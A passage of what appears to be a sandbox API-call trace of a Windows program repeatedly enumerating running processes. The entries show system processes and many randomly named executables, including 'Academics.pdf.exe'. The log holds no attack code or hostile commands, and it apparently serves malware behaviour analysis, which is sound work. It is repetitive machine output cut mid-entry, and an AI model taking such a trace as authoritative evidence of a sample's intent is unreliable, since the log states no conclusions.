th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0294.230] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0294.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.232] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.233] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0294.236] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.237] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0294.238] CloseHandle (hObject=0x294) returned 1 [0294.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0294.239] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0294.239] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.240] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0294.242] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.243] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.244] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0294.253] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.254] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.255] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.256] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.257] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.258] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.258] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.263] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0294.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0294.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0294.266] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0294.267] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0294.268] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0294.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0294.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0294.270] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0294.271] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0294.272] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0294.273] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0294.274] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0294.275] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0294.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0294.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0294.277] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0294.278] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0294.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0294.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0294.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.281] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.282] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.285] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0294.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0294.288] CloseHandle (hObject=0x294) returned 1 [0294.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0294.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0294.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0294.291] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0294.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 